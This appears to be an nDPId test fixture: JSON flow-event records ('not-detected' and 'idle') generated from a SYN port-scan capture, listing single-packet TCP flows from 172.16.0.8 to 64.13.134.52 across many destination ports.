+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
